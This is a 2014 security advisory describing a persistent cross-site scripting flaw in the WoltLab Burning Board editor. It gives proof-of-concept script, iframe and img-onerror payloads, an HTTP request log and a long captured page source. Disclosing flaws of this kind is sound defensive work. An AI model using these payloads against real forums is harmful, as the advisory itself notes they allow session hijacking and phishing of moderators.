Document Title:
===============
Woltlab Burning Board 3.9.1 pl1 - Persistent Web Vulnerability & Editor Reverse Encoding Issue


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1256

Video: http://www.vulnerability-lab.com/get_content.php?id=1257


Release Date:
=============
2014-04-11


Vulnerability Laboratory ID (VL-ID):
====================================
1256


Common Vulnerability Scoring System:
====================================
3.5


Product & Service Introduction:
===============================
WoltLab Burning Board ist eine von der WoltLab GmbH entwickelte, auf der Scriptsprache PHP basierende und objektorientiert programmierte Forensoftware.
Im Gegensatz zu den Vorversionen wurde es unter Nutzung von PHP 5 komplett objektorientiert programmiert und erzeugt Markup, das den aktuellen Webstandards 
XHTML 1.1 und CSS2 entspricht. Schwerpunkte der Entwicklung lagen bei der Benutzung von semantischem HTML und Barrierefreiheit. Das Templatesystem wurde in 
der Syntax nun an Smarty angelehnt und bietet deutlich weiter gehende Möglichkeiten als in Version 2. Architektonisch gliedert sich die Software ab Version 
3 in ein Framework mit dem Namen WoltLab Community Framework (WCF), das als Grundlage für die Entwicklung von Endanwendungen dient, und die darauf aufbauende 
Endanwendung Burning Board 3. Die Quelltexte des Kerns des WCF steht unter der Open-Source-Lizenz LGPL.

Version 3.1 des Burning Board, welche am 14. Oktober 2009 veröffentlicht wurde, basiert auf der WCF-Version 1.1 und brachte viele Detailverbesserungen und ein 
völlig überarbeitetes Benutzerprofil, welches nun durch Profil-Plugins wie etwa Gästebuch, Galerie oder Blog, erweitert werden kann. Das am 6. März 2008 
veröffentlichte kostenlose Burning Board Lite 2 ist keine Weiterentwicklung von Burning Board Lite 1, sondern basiert auf dem WoltLab Community Framework und 
Burning Board 3. Burning Board Lite 2 ist sowohl für kleinere Forenprojekte gedacht, welche nicht den gesamten Funktionsumfang der Vollversion benötigen, als 
auch als produktiv einsetzbare Demo von Burning Board 3 anzusehen. Am 11. November 2010 veröffentlichte Woltlab das Burning Board Lite 2.1. Es basiert auf dem 
Woltlab Community Framework 1.1 und bietet Funktionen, die bisher nur in kostenpflichtigen Versionen vorhanden waren. Das sind das neue Benutzerprofil und der 
WYSIWYG-Editor aus Version 3.1, eine Überarbeitung des Skins, eine Mitglieder-Suchfunktion, erweiterte Einstellungen für die Dateigröße sowie PN-Versand.

(Copy of the Homepage: http://de.wikipedia.org/wiki/WoltLab_Burning_Board )



Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a persistent input validation web vulnerability in the official Woltlab GmbH - Burning Board v3.9.1. PL1 web-application


Vulnerability Disclosure Timeline:
==================================
2014-04-11:	Researcher Notification & Coordination (Ateeq ur Rehman Khan)
2014-00-00:	Vendor Notification (Woltlab GmbH Security Team)
2014-00-00:	Vendor Response/Feedback (Woltlab GmbH Security Team)
2014-00-00:	Vendor Fix/Patch (Woltlab GmbH Developer Team)
2014-00-00:	Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Woltlab GmbH
Product: Woltlab Burning Board - Forum Web Application 3.9.1 PL 1


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
A persistent input validation web vulnerability has been discovered in the official Woltlab GmbH Burning Board v3.0.9 pl1 web-application.
The issue allows remote attackers to bypass the encoding filter of the editor to execute malicious persistent script codes on the application-side.

Remote attackers are able to include malicious script codes while creating a new forum thread. Since the application fails to perform proper 
input sanatization by a secure re-encoding, the injected payloads get executed after an administrator or moderator reviews the post and tries 
to `Edit` and or `Quote/MultiQuote` the same thread. The script code execution occurs after an click of the img resource button of the WYSIWYG editor module.

The vulnerability affects the `mce_editor_0_codeview` module. The same vulnerability also gets triggered if the moderator/administrator clicks 
on the `Insert Image` button while in the editor mode. By clicking the img button the short link which is marked get reverse encoded which results 
in the execution of the injected script codes via POST.

Exploitation of the vulnerability requires a low privileged user account and low user interaction by an administrator or moderator of the forum.
Successful exploitation results in persistent application-side phishing, application-side redirects, application-side session hijacking attacks and 
persistent manipulation of affected module context.

Request Method(s):
				[+] POST

Vulnerable Module(s):
				[+] mce_editor_0_codeview

Vulnerable Parameter(s):
				[+] form > postID

Affected Module(s):
				[+] Quote & Multi Quote Post (Editor)
				[+] Edit Post (Editor)

Affected Version(s):
				[+] Burning Board 3.0.9 pl 1 (Sunrise)
				[+] Community Framework Version - 1.0.11 pl 4 (Horizon)

Vulnerable Package(s):
				[+] com.woltlab.wcf.form.message.wysiwyg (1.0.10 pl 3 - Date:Mar 22nd 2010 - Author: WoltLab GmbH)



Proof of Concept (PoC):
=======================
The persistent bug and filter issue can be exploited by remote attackers with low privileged forum application user account and 
low user interaction by an administrator or moderator user account. For security demonstration or to reproduce the vulnerability 
follow the provided information and steps below to continue.

Scenario 1: Remote
1. A remote attacker includes a broken link with malicious script codes to hijack the moderator or administrator session.
2. An moderator or administrator is reviewing the broken post and click on quote or edit to review the original source to fix
3. In the same moment the administrator or moderator clicks the image source edit button through the regular editor (non sourcecode view) the script codes executes (application-side)

Scenario 2: Local
1. A local attacker opens a post and is able to inject own script codes, quotes his own post and clicks the image edit button to execute the code.
2. He is also able to save the link and request the cookies by usage of the affected form=PostEdit&postID parameters.


PoC: 
\'"><sCrIpt><iframe%20src=x%20onload=confirm(2)></iframe>>TEST<h1>TESTing</h1></sCrIpT>
#
"><img onerror=prompt(/POC/) src=x></img>\'"><sCrIpt><iframe%20src=x%20onload=confirm(2)></iframe>>TEST<h1>TESTing</h1></sCrIpT>
#
"><img onerror=prompt(/POC/) src=x></img>%20"><iframe src=javascript:\u0061lert(/Test-Ateeq-Board/)></iframe>


--- Validation Problem Editor Output after the Reverse Encode [img button] ---
[img]x[/img]\'">
">[img]x[/img]" wcf_src="
\'">
"[img]
">[img]x[/img]\'">
">[img]x[/img]" alt="
sCrIpT>
"[img]
sCrIpT>
img>" title="
sCrIpT>
"[img]
sCrIpT>
img>" /> [quote='Ateeq Ur Rehman Khan',index.php?page=Thread&postID=31#post31][url='asdasdsad'] adsasd[/url][/img]"[/quote]



HTTP Logs:
GET /forum/index.php?form=PostAdd&postID=23&action=quote HTTP/1.1
Host: vulnerability-db.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://vulnerability-db.com/forum/index.php?page=Thread&threadID=15
Cookie: wcf_cookieHash=[HIDDEN]; wcf_boardLastActivityTime=1397172274; wcf_userID=[]; wcf_password=[HIDDEN]
Connection: keep-alive


Response:
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Apr 2014 10:46:00 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PleskLin
Content-Length: 69495

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en"><head>
	<title>Reply - test 1 - TalkBox #337 - VULNERABILITY LABORATORY - SECURITY RESEARCH FORUM </title>
	<meta http-equiv="content-type" content="text/html; charset=UTF-8" />
<meta http-equiv="content-script-type" content="text/javascript" />
<meta http-equiv="content-style-type" content="text/css" />
<meta name="description" content="advisory, vulnerabilities, vulnerability, exploit, security, live, hack, zero day, bug, secure, hacking, research, researcher, seals, bugs, security technics, exploits, exploit videos, documents, 

analyses, malware, attacker, attack, sec, releases, 0 day, analysts, exploiter, release, bug bounty, reward" />
<meta name="keywords" content="advisory, vulnerabilities, vulnerability, exploit, security, live, hack, zero day, bug, secure, hacking, research, researcher, seals, bugs, security technics, exploits, exploit videos, documents, analyses, 

malware, attacker, attack, sec, releases, 0 day, analysts, exploiter, release, bug bounty, reward" />
<meta name="robots" content="noindex,nofollow" />
<!-- wbb styles -->
<link rel="stylesheet" type="text/css" media="screen" href="style/burningBoard.css" />


<!-- dynamic styles -->
<link rel="stylesheet" type="text/css" media="screen" href="wcf/style/style-1.css" />
<!-- print styles -->
<link rel="stylesheet" type="text/css" media="print" href="wcf/style/extra/print.css" />

<script type="text/javascript">
	//<![CDATA[
	var SID_ARG_2ND	= '';
	var RELATIVE_WCF_DIR = 'wcf/';
	var RELATIVE_WBB_DIR = '';
	//]]>
</script>

<!-- hack styles -->
<!--[if lt IE 7]>
	<link rel="stylesheet" type="text/css" media="screen" href="wcf/style/extra/ie6-fix.css" />
	<style type="text/css">		
 #page { /* note: non-standard style-declaration */
				_width: expression(((document.body.clientWidth/screen.width)) < 0.7 ? "760px":"80%" );
			}
			</style>
<![endif]-->

<!--[if IE 7]>
	<link rel="stylesheet" type="text/css" media="screen" href="wcf/style/extra/ie7-fix.css" />
<![endif]-->


<script type="text/javascript" src="wcf/js/default.js"></script>
<script type="text/javascript" src="wcf/js/PopupMenuList.class.js"></script>
<script type="text/javascript" src="wcf/js/AjaxRequest.class.js"></script>

	<script type="text/javascript" src="wcf/js/TabbedPane.class.js"></script>
	<script type="text/javascript" src="wcf/js/ImageResizer.class.js"></script>
	<script type="text/javascript" src="wcf/js/Wysiwyg.class.js"></script>
<script type="text/javascript">
//<![CDATA[
// language
var language = new Object();
language['undo.desc'] = "Undo";language['redo.desc'] = "Redo";
language['b.desc'] = "Bold";language['i.desc'] = "Italic";language['u.desc'] = "Underline";language['s.desc'] = "Strike through";
language['toolbar.focus'] = "Select toolbar";
language['link.desc'] = "Insert link";language['link.insert.url'] = "Enter the complete address of the link:";language['link.insert.url.optional']= 
"Enter the complete address of the link (optional):";language['link.insert.name'] = "Enter a linkname (optional)";language['unlink.desc'] = "Remove link";language['insertText'] = "Insert text to format (optional).";
language['textAlignLeft.desc'] = "Align left";language['textAlignCenter.desc'] = "Align center";language['textAlignRight.desc'] = "Align right";language['textJustify.desc'] = "Justify";
language['bullist.desc'] = "Unordered list";language['numlist.desc'] = "Ordered list";
language['cut.desc'] = "Cut";language['copy.desc'] = "Copy";language['paste.desc'] = "Paste";
language['img.desc'] = "Insert image";language['image.insert'] = "Please enter the URL of the image.";
language['color.desc'] = "Select font colour";language['fontsize.default'] = "Font size";language['fontFamily.default'] = "Font family";
language['quotation.desc'] = "Insert quotes";language['quote.desc'] = "Insert quotation";language['code.desc'] = "Insert code";
language['view.wysiwyg'] = "Editor";language['view.code'] = "Source code";
language['noFormElement'] = "Error: Could not find the target element.";language['extraBBCodeNotValid'] = "Your input is not correct."; 

// language direction
var languageDirection = "ltr";

// smileys
var smilies = new Object();
	smilies[':)'] = new Array('wcf\/images\/smilies\/smile.png', 'smile');
	smilies[':('] = new Array('wcf\/images\/smilies\/sad.png', 'sad');
	smilies[';)'] = new Array('wcf\/images\/smilies\/wink.png', 'wink');
	smilies[':P'] = new Array('wcf\/images\/smilies\/tongue.png', 'tongue');
	smilies['8)'] = new Array('wcf\/images\/smilies\/cool.png', 'Cool');
	smilies[':D'] = new Array('wcf\/images\/smilies\/biggrin.png', 'biggrin');
	smilies[';('] = new Array('wcf\/images\/smilies\/crying.png', 'crying');
	smilies[':rolleyes:'] = new Array('wcf\/images\/smilies\/rolleyes.png', 'rolleyes');
	smilies[':huh:'] = new Array('wcf\/images\/smilies\/huh.png', 'Huh');
	smilies[':S'] = new Array('wcf\/images\/smilies\/unsure.png', 'unsure');
	smilies[':love:'] = new Array('wcf\/images\/smilies\/love.png', 'love');
	smilies['X('] = new Array('wcf\/images\/smilies\/angry.png', 'angry');
	smilies['8|'] = new Array('wcf\/images\/smilies\/blink.png', 'blink');
	smilies['?('] = new Array('wcf\/images\/smilies\/confused.png', 'confused');
	smilies[':cursing:'] = new Array('wcf\/images\/smilies\/cursing.png', 'cursing');
	smilies[':|'] = new Array('wcf\/images\/smilies\/mellow.png', 'mellow');
	smilies[':thumbdown:'] = new Array('wcf\/images\/smilies\/thumbdown.png', 'thumbdown');
	smilies[':thumbsup:'] = new Array('wcf\/images\/smilies\/thumbsup.png', 'thumbsup');
	smilies[':thumbup:'] = new Array('wcf\/images\/smilies\/thumbup.png', 'thumbup');
	smilies['8o'] = new Array('wcf\/images\/smilies\/w00t.png', 'w00t');
	smilies[':pinch:'] = new Array('wcf\/images\/smilies\/pinch.png', 'pinch');
	smilies[':sleeping:'] = new Array('wcf\/images\/smilies\/sleeping.png', 'sleeping');
	smilies[':wacko:'] = new Array('wcf\/images\/smilies\/wacko.png', 'wacko');
	smilies[':whistling:'] = new Array('wcf\/images\/smilies\/whistling.png', 'whistling');
	smilies[':evil:'] = new Array('wcf\/images\/smilies\/evil.png', 'evil');
	smilies['^^'] = new Array('wcf\/images\/smilies\/squint.png', 'squint');
	smilies[':?:'] = new Array('wcf\/images\/smilies\/question.png', 'question');
	smilies[':!:'] = new Array('wcf\/images\/smilies\/attention.png', 'attention');

// bbcodes
var coreBBCodes = new Object();
var extraBBCodes = new Object();
var sourceCodes = new Object();
			var tmpBBCode = { wysiwyg:1, bbCode:'b', htmlOpen:'strong', htmlClose:'strong', icon:'fontStyleBoldM.png', sourceCode:0, attributes:[] };
		coreBBCodes['b'] = tmpBBCode;				language['b.title'] = "wcf.bbcode.b.title";
 var tmpBBCode = { wysiwyg:1, bbCode:'i', htmlOpen:'em', htmlClose:'em', icon:'fontStyleItalicM.png', sourceCode:0, attributes:[] };
		coreBBCodes['i'] = tmpBBCode;				language['i.title'] = "wcf.bbcode.i.title";
 var tmpBBCode = { wysiwyg:1, bbCode:'u', htmlOpen:'span style="text-decoration: underline"', htmlClose:'span', icon:'fontStyleUnderlineM.png', sourceCode:0, attributes:[] };
		coreBBCodes['u'] = tmpBBCode;				language['u.title'] = "wcf.bbcode.u.title";
 var tmpBBCode = { wysiwyg:1, bbCode:'s', htmlOpen:'span style="text-decoration: line-through"', htmlClose:'span', icon:'fontStyleStriketroughM.png', sourceCode:0, attributes:[] };
		coreBBCodes['s'] = tmpBBCode;				language['s.title'] = "wcf.bbcode.s.title";
 var tmpBBCode = { wysiwyg:0, bbCode:'sub', htmlOpen:'sub', htmlClose:'sub', icon:'', sourceCode:0, attributes:[] };
		extraBBCodes['sub'] = tmpBBCode;				language['sub.title'] = "wcf.bbcode.sub.title";
 var tmpBBCode = { wysiwyg:0, bbCode:'sup', htmlOpen:'sup', htmlClose:'sup', icon:'', sourceCode:0, attributes:[] };
		extraBBCodes['sup'] = tmpBBCode;				language['sup.title'] = "wcf.bbcode.sup.title";
var tmpBBCode = { wysiwyg:0, bbCode:'email', htmlOpen:'a', htmlClose:'a', icon:'', sourceCode:0, attributes:[{ attributeHTML:'href="mailto:%s"', validationPattern:'^[^\\s]+@[^\\s]+$', required:1 

}] };
		extraBBCodes['email'] = tmpBBCode;				language['email.title'] = "wcf.bbcode.email.title";
 language['email.attribute1.promptText'] = "wcf.bbcode.email.promptText";
 var tmpBBCode = { wysiwyg:1, bbCode:'color', htmlOpen:'span', htmlClose:'span', icon:'fontColorPickerEmptyM.png', sourceCode:0, attributes:[{ attributeHTML:'style="color: %s"', 

validationPattern:'^[0-9a-z#]+$', required:1 }] };
		coreBBCodes['color'] = tmpBBCode;				language['color.title'] = "wcf.bbcode.color.title";
 language['color.attribute1.promptText'] = "wcf.bbcode.color.promptText";
 var tmpBBCode = { wysiwyg:1, bbCode:'size', htmlOpen:'span', htmlClose:'span', icon:'', sourceCode:0, attributes:[{ attributeHTML:'style="font-size: %dpt"', validationPattern:'^([89]{1}|[1-3]{1}

[0-9]{1})$', required:1 }] };
		coreBBCodes['size'] = tmpBBCode;				language['size.title'] = "wcf.bbcode.size.title";
 language['size.attribute1.promptText'] = "wcf.bbcode.size.promptText";
 var tmpBBCode = { wysiwyg:1, bbCode:'font', htmlOpen:'span', htmlClose:'span', icon:'', sourceCode:0, attributes:[{ attributeHTML:'style="font-family: %s"', validationPattern:'^[^"\';}\\(\\)]*$', 

required:1 }] };
		coreBBCodes['font'] = tmpBBCode;				language['font.title'] = "wcf.bbcode.font.title";
 language['font.attribute1.promptText'] = "wcf.bbcode.font.promptText";
 var tmpBBCode = { wysiwyg:1, bbCode:'align', htmlOpen:'div', htmlClose:'div', icon:'', sourceCode:0, attributes:[{ attributeHTML:'style="text-align: %s"', validationPattern:'^(left|right|center|

justify)$', required:1 }] };
		coreBBCodes['align'] = tmpBBCode;				language['align.title'] = "wcf.bbcode.align.title";
 language['align.attribute1.promptText'] = "wcf.bbcode.align.promptText";
 var tmpBBCode = { wysiwyg:0, bbCode:'quote', htmlOpen:'', htmlClose:'', icon:'quoteM.png', sourceCode:0, attributes:[{ attributeHTML:'', validationPattern:'', required:0 }, { attributeHTML:'', 

validationPattern:'', required:0 }] };
		coreBBCodes['quote'] = tmpBBCode;				language['quote.title'] = "Quoted{if $quoteAuthor} from "{@$quoteAuthor}"{/if}";
 language['quote.attribute1.promptText'] = "wcf.bbcode.quote.promptText";
 language['quote.attribute2.promptText'] = "wcf.bbcode.quote.promptText";
 var tmpBBCode = { wysiwyg:0, bbCode:'code', htmlOpen:'', htmlClose:'', icon:'insertCodeM.png', sourceCode:1, attributes:[{ attributeHTML:'', validationPattern:'^\\d+$', required:0 }] };
		coreBBCodes['code'] = tmpBBCode;		sourceCodes['code'] = 'code';		language['code.title'] = "Source code";
 language['code.attribute1.promptText'] = "wcf.bbcode.code.promptText";
 var tmpBBCode = { wysiwyg:1, bbCode:'img', htmlOpen:'img', htmlClose:'', icon:'insertImageM.png', sourceCode:0, attributes:[{ attributeHTML:'src="%s" class="resizeImage" alt=""', 

validationPattern:'^[^?\\s]+$', required:1 }, { attributeHTML:'style="float: %s"', validationPattern:'^(left|right)$', required:0 }] };
		coreBBCodes['img'] = tmpBBCode;				language['img.title'] = "wcf.bbcode.img.title";
 language['img.attribute1.promptText'] = "wcf.bbcode.img.promptText";
 language['img.attribute2.promptText'] = "wcf.bbcode.img.promptText";
 var tmpBBCode = { wysiwyg:0, bbCode:'url', htmlOpen:'', htmlClose:'', icon:'', sourceCode:0, attributes:[{ attributeHTML:'', validationPattern:'^.+$', required:1 }] };
		coreBBCodes['url'] = tmpBBCode;				language['url.title'] = "wcf.bbcode.url.title";
 language['url.attribute1.promptText'] = "wcf.bbcode.url.promptText";
 var tmpBBCode = { wysiwyg:0, bbCode:'list', htmlOpen:'', htmlClose:'', icon:'', sourceCode:0, attributes:[{ attributeHTML:'', validationPattern:'^(1|a|none|circle|square|disc|decimal|lower-roman|

upper-roman|decimal-leading-zero|lower-greek|lower-latin|upper-latin|armenian|georgian)$', required:0 }] };
		coreBBCodes['list'] = tmpBBCode;				language['list.title'] = "wcf.bbcode.list.title";
 language['list.attribute1.promptText'] = "wcf.bbcode.list.promptText";
 var tmpBBCode = { wysiwyg:0, bbCode:'attach', htmlOpen:'', htmlClose:'', icon:'', sourceCode:0, attributes:[{ attributeHTML:'', validationPattern:'^\\d+$', required:1 }] };
		extraBBCodes['attach'] = tmpBBCode;				language['attach.title'] = "wcf.bbcode.attach.title";
 language['attach.attribute1.promptText'] = "wcf.bbcode.attach.promptText";
 var tmpBBCode = { wysiwyg:0, bbCode:'tpl', htmlOpen:'', htmlClose:'', icon:'', sourceCode:1, attributes:[{ attributeHTML:'', validationPattern:'^\\d+$', required:0 }] };
		extraBBCodes['tpl'] = tmpBBCode;		sourceCodes['tpl'] = 'tpl';		language['tpl.title'] = "Template source code";
 language['tpl.attribute1.promptText'] = "wcf.bbcode.tpl.promptText";
 var tmpBBCode = { wysiwyg:0, bbCode:'xml', htmlOpen:'', htmlClose:'', icon:'', sourceCode:1, attributes:[{ attributeHTML:'', validationPattern:'^\\d+$', required:0 }] };
		extraBBCodes['xml'] = tmpBBCode;		sourceCodes['xml'] = 'xml';		language['xml.title'] = "XML";
 language['xml.attribute1.promptText'] = "wcf.bbcode.xml.promptText";
 var tmpBBCode = { wysiwyg:0, bbCode:'html', htmlOpen:'', htmlClose:'', icon:'', sourceCode:1, attributes:[{ attributeHTML:'', validationPattern:'^\\d+$', required:0 }] };
		extraBBCodes['html'] = tmpBBCode;		sourceCodes['html'] = 'html';		language['html.title'] = "HTML";
 language['html.attribute1.promptText'] = "wcf.bbcode.html.promptText";
 var tmpBBCode = { wysiwyg:0, bbCode:'css', htmlOpen:'', htmlClose:'', icon:'', sourceCode:1, attributes:[{ attributeHTML:'', validationPattern:'^\\d+$', required:0 }] };
		extraBBCodes['css'] = tmpBBCode;		sourceCodes['css'] = 'css';		language['css.title'] = "Cascading style sheet";
 language['css.attribute1.promptText'] = "wcf.bbcode.css.promptText";
 var tmpBBCode = { wysiwyg:0, bbCode:'mysql', htmlOpen:'', htmlClose:'', icon:'insertMysqlM.png', sourceCode:1, attributes:[{ attributeHTML:'', validationPattern:'^\\d+$', required:0 }] };
		extraBBCodes['mysql'] = tmpBBCode;		sourceCodes['mysql'] = 'mysql';		language['mysql.title'] = "MySQL queries";
 language['mysql.attribute1.promptText'] = "wcf.bbcode.mysql.promptText";
 var tmpBBCode = { wysiwyg:0, bbCode:'java', htmlOpen:'', htmlClose:'', icon:'', sourceCode:1, attributes:[{ attributeHTML:'', validationPattern:'^\\d+$', required:0 }] };
		extraBBCodes['java'] = tmpBBCode;		sourceCodes['java'] = 'java';		language['java.title'] = "Java source code";
 language['java.attribute1.promptText'] = "wcf.bbcode.java.promptText";
 var tmpBBCode = { wysiwyg:0, bbCode:'php', htmlOpen:'', htmlClose:'', icon:'insertPhpM.png', sourceCode:1, attributes:[{ attributeHTML:'', validationPattern:'^\\d+$', required:0 }] };
		extraBBCodes['php'] = tmpBBCode;		sourceCodes['php'] = 'php';		language['php.title'] = "PHP Source code";
 language['php.attribute1.promptText'] = "wcf.bbcode.php.promptText";
 var tmpBBCode = { wysiwyg:0, bbCode:'clipfish', htmlOpen:'', htmlClose:'', icon:'', sourceCode:0, attributes:[{ attributeHTML:'', validationPattern:'', required:1 }] };
		extraBBCodes['clipfish'] = tmpBBCode;				language['clipfish.title'] = "Clipfish video";
 language['clipfish.attribute1.promptText'] = "wcf.bbcode.clipfish.promptText";
 var tmpBBCode = { wysiwyg:0, bbCode:'googlevideo', htmlOpen:'', htmlClose:'', icon:'', sourceCode:0, attributes:[{ attributeHTML:'', validationPattern:'', required:1 }] };
		extraBBCodes['googlevideo'] = tmpBBCode;				language['googlevideo.title'] = "Google video";
 language['googlevideo.attribute1.promptText'] = "wcf.bbcode.googlevideo.promptText";
 var tmpBBCode = { wysiwyg:0, bbCode:'myspace', htmlOpen:'', htmlClose:'', icon:'', sourceCode:0, attributes:[{ attributeHTML:'', validationPattern:'', required:1 }] };
		extraBBCodes['myspace'] = tmpBBCode;				language['myspace.title'] = "MySpace video";
 language['myspace.attribute1.promptText'] = "wcf.bbcode.myspace.promptText";
 var tmpBBCode = { wysiwyg:0, bbCode:'myvideo', htmlOpen:'', htmlClose:'', icon:'', sourceCode:0, attributes:[{ attributeHTML:'', validationPattern:'', required:1 }, { attributeHTML:'', 

validationPattern:'^(s|m|l|S|M|L)$', required:0 }] };
		extraBBCodes['myvideo'] = tmpBBCode;				language['myvideo.title'] = "MyVideo video";
 language['myvideo.attribute1.promptText'] = "wcf.bbcode.myvideo.promptText";
 language['myvideo.attribute2.promptText'] = "wcf.bbcode.myvideo.promptText";
 var tmpBBCode = { wysiwyg:0, bbCode:'youtube', htmlOpen:'', htmlClose:'', icon:'', sourceCode:0, attributes:[{ attributeHTML:'', validationPattern:'', required:1 }, { attributeHTML:'', 

validationPattern:'^wide$', required:0 }] };
		extraBBCodes['youtube'] = tmpBBCode;				language['youtube.title'] = "YouTube video";
 language['youtube.attribute1.promptText'] = "wcf.bbcode.youtube.promptText";
 language['youtube.attribute2.promptText'] = "wcf.bbcode.youtube.promptText";
 var tmpBBCode = { wysiwyg:0, bbCode:'sevenload', htmlOpen:'', htmlClose:'', icon:'', sourceCode:0, attributes:[{ attributeHTML:'', validationPattern:'', required:1 }] };
		extraBBCodes['sevenload'] = tmpBBCode;				language['sevenload.title'] = "Sevenload video";
 language['sevenload.attribute1.promptText'] = "wcf.bbcode.sevenload.promptText";
 var tmpBBCode = { wysiwyg:0, bbCode:'js', htmlOpen:'', htmlClose:'', icon:'', sourceCode:1, attributes:[{ attributeHTML:'', validationPattern:'^\\d+$', required:0 }] };
		extraBBCodes['js'] = tmpBBCode;		sourceCodes['js'] = 'js';		language['js.title'] = "Javascript source code";
 language['js.attribute1.promptText'] = "wcf.bbcode.js.promptText";
 var tmpBBCode = { wysiwyg:0, bbCode:'c', htmlOpen:'', htmlClose:'', icon:'', sourceCode:1, attributes:[{ attributeHTML:'', validationPattern:'^\\d+$', required:0 }] };
		extraBBCodes['c'] = tmpBBCode;		sourceCodes['c'] = 'c';		language['c.title'] = "C/C++ Source code";
 language['c.attribute1.promptText'] = "wcf.bbcode.c.promptText";
			errorField = false;
// build editor. pass neccessary variables
tinyMCE.init({
	// set active view flag (code or wysiwyg) ($editorIsActive) (default:wysiwyg)
	editorIsActive : 0,
	
	// set available views (default: both views available)
	editorEnableWysiwygView : 1,
	editorEnableCodeView : 1,	
		
	// set some url vars
	iconURL : "wcf/icon/",
	imageURL : "wcf/icon/wysiwyg/",
	blankHTML : "wcf/js/blank.htm",
	cssFile : "wcf/style/style-1.css",
		
	// set editor height var ($wysiwygHeight)
	height: 200,
	
	// set page default font color var
	defaultPageFontColor: '#ccc'
});
//]]>
</script></head>
<body>

<div id="page">
	<a id="top"></a>
	<div id="userPanel" class="userPanel">
 <p id="date">
				<img src="wcf/icon/dateS.png" alt="" /> <span>Friday, April 11th 2014, 12:46pm UTC+2</span>
			</p>
				<p id="userNote"> 
			Welcome <a href="index.php?page=User&userID=7">Ateeq Ur Rehman Khan</a>.		</p>
		<div id="userMenu">
			<ul>
 				<li><a href="index.php?action=UserLogout&t=fc3551d52e1c22c37818f3ed0f5fedb4772f4188"><img src="wcf/icon/logoutS.png" alt="" /> <span>Logout</span></a></li>
 <li><a href="index.php?form=UserProfileEdit"><img src="wcf/icon/profileS.png" alt="" /> <span>My Profile</span></a></li>
  	<li ><a href="index.php?page=PMList"><img src="wcf/icon/pmEmptyS.png" alt="" /> <span>Private Messages</span></a></li>
  
 		</ul>
		</div>
	</div>
  	
	<div id="header" class="border">
		<div id="search">
			<form method="post" action="index.php?form=Search">
		
				<div class="searchContainer">
 <input type="text" tabindex="5" id="searchInput" class="inputText" name="q" value="Enter search word" />
 <input type="image" tabindex="6" id="searchSubmit" class="searchSubmit inputImage" src="wcf/icon/submitS.png" alt="Submit" />
  <input type="hidden" name="types[]" value="post" /> 
 <script type="text/javascript">
 	//<![CDATA[
 	document.getElementById('searchInput').setAttribute('autocomplete', 'off');
 	document.getElementById('searchInput').onfocus = function() { if (this.value == 'Enter search word') this.value=''; };
 	document.getElementById('searchInput').onblur = function() { if (this.value == '') this.value = 'Enter search word'; };
 	document.getElementById('searchSubmit').ondblclick = function() { window.location = 'index.php?form=Search'; };
  			popupMenuList.register("searchInput");
 		document.getElementById('searchInput').className += " searchOptions";
  		//]]>
 </script>
  	<div class="searchInputMenu">
 		<div class="hidden" id="searchInputMenu">
 			<div class="pageMenu smallFont">
 				<ul>
  			<li><a href="index.php?form=Search&action=unread">Unread posts</a></li>
			<li><a href="index.php?form=Search&action=unreplied">Unreplied threads</a></li>
			<li><a href="index.php?form=Search&action=24h">Threads of the last 24 hours</a></li>
  		<li><a href="index.php?form=Search">Advanced Search</a></li> 				</ul>
 			</div>
 		</div>
 	</div>
  
  	<noscript>
 		<p><a href="index.php?form=Search">Advanced Search</a></p>
 	</noscript>
 				</div>
			</form>
		</div>
		<div id="logo">
			<h1 class="pageTitle"><a href="index.php?page=Index">VULNERABILITY LABORATORY - SECURITY RESEARCH FORUM</a></h1>
 </div>
		
		
	<div id="mainMenu" class="mainMenu">
<div><ul><li class="firstActive"><a href="index.php?page=Index" title="Forum"><img src="icon/indexM.png" alt="" /> 
<span>Forum</span></a></li><li><a href="index.php?page=MembersList" title="Members"><img 

src="wcf/icon/membersM.png" alt="" /> <span>Members</span></a></li><li><a href="index.php?page=Help" title="Help"><img src="wcf/icon/helpM.png" alt="" /> 
<span>Help</span></a></li><li class="last"><a href="index.php?page=LegalNotice" 

title="Legal Notice"><img src="wcf/icon/legalNoticeM.png" alt="" /> <span>Legal Notice</span></a></li></ul>
		</div>
	</div>	</div>
	


<div id="main">
	
	<ul class="breadCrumbs">
			<li><a href="index.php?page=Index"><img src="icon/indexS.png" alt="" /> <span>VULNERABILITY LABORATORY - SECURITY RESEARCH FORUM</span></a> »</li>
		
			<li><a href="index.php?page=Board&boardID=22"><img src="icon/categoryS.png" alt="" /> <span># Vulnerability Laboratory - Public Communication Forums</span></a> »</li>
		
			<li><a href="index.php?page=Board&boardID=23"><img src="icon/boardS.png" alt="" /> <span>TalkBox #337</span></a> »</li>
		
			<li><a href="index.php?page=Thread&threadID=15"><img src="icon/threadS.png" alt="" /> <span>test 1</span></a> »</li>
	</ul>	
	<div class="mainHeadline">
		<img src="icon/postReplyL.png" alt="" />
		<div class="headlineContainer">
			<h2>Reply</h2>
		</div>
	</div>
	
	
	<form enctype="multipart/form-data" method="post" action="index.php?form=PostAdd&threadID=15">
		<div class="border content">
			<div class="container-1">
			
				<fieldset>
 <legend>Message information</legend>
 
  
 <div class="formElement">
 	<div class="formFieldLabel">
 		<label for="subject">Subject</label>
 	</div>
 	<div class="formField">
 		<input type="text" class="inputText" id="subject" name="subject" value="RE: test 1" tabindex="8" />
  			</div>
 </div>
				
 				</fieldset>
			
				<fieldset>
 <legend>Message</legend>
				
 <div class="formElement" id="editor">
 	<div class="formFieldLabel">
 		<label for="text">Message</label>
 	</div>
 	<div class="formField">
